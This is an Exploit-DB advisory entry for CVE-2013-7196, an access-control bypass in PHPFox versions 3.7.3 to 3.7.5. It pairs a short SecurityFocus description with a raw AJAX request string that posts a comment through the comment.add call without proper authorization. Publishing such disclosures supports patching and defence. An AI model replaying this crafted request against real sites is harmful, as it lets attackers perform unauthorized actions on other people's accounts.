PHPFox Access Control Security Bypass Vulnerability

2014-04-05T00:00:00
ID EDB-ID:39139
Type exploitdb
Reporter Wesley Henrique
Modified 2014-04-05T00:00:00

Description

PHPFox Access Control Security Bypass Vulnerability. CVE-2013-7196. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/66677/info

PHPFox is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.

Attackers can leverage this issue to bypass security restrictions and perform unauthorized actions; this may aid in launching further attacks.

PHPFox 3.7.3, 3.7.4 and 3.7.5 are vulnerable 

&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290